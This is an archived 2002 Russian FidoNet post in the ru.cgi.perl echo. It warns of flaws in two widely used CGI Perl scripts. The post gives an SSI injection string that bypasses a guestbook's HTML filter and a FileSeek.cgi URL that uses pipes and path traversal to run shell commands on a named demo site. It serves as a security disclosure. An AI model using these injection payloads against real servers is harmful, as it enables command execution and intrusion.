Главная страница


ru.cgi.perl

 
 - RU.CGI.PERL ------------------------------------------------------------------
 From : Alex Bachin                          2:5020/400     30 Apr 2002  09:08:54
 To : All
 Subject : Люди, будбте бдительны!
 -------------------------------------------------------------------------------- 
 
 Тут от нечего делать решил проверить классиков
 перловых скриптов на вшивость :)))
 
 1. гостевая книга от www.worldwidemart.com
 конечно, этого автора считают очень плохим скриптописателем,
 но его скрипты распространены в инете
 Итак: имеем конструкцию
 
    $value =~ s/<!--(.|\n)*-->//g;
    if ($allow_html != 1) {
       $value =~ s/<([^>]|\n)*>//g;
    }
 
 Что получится при дефалтовом параметре $allow_html=1
 и вводе в поле сообщения строки
 <<!-- -->!--#exec cmd="ls /">
 предоставляется вдумчивому читателю
 Волосы дыбом встают
 
 2. CGI/Perl Cookbook
 http://www.cgi-perl.com/
 Hебольшое издевательство над параметрами скрипта
 FileSeek, например
 http://www.cgi-perl.com/programs/FileSeek/Demo/FileSeek.cgi?head=|ls%20....//...
 .//....//....//....//etc|
 и вуаля!
 вместо команды ls можно подставить и более интересные командочки  :)))
 "Какой удар от классика!" (с) Остап Бендер
 
 --- ifmail v.2.15dev5
  * Origin: Demos online service (2:5020/400)
 
 

Вернуться к списку тем, сортированных по: возрастание даты  уменьшение даты  тема  автор 

 Тема:    Автор:    Дата:  
 Люди, будбте бдительны!   Alex Bachin   30 Apr 2002 09:08:54 
 Hа: Люди, будбте бдительны!   Alexander V. Gaiduk   30 Apr 2002 10:39:22 
 Re: Люди, будбте бдительны!   Artem Chuprina   30 Apr 2002 11:08:12 
 Re: Люди, будбте бдительны!   Alex Bachin   30 Apr 2002 12:53:07 
 Re: Люди, будбте бдительны!   Artem Chuprina   30 Apr 2002 17:19:46 
 Re: Люди, будбте бдительны!   Nikolay Pichtin   01 May 2002 11:31:01 
Архивное /ru.cgi.perl/72097c3f2175.html, оценка 1 из 5, голосов 10
Яндекс.Метрика
Valid HTML 4.01 Transitional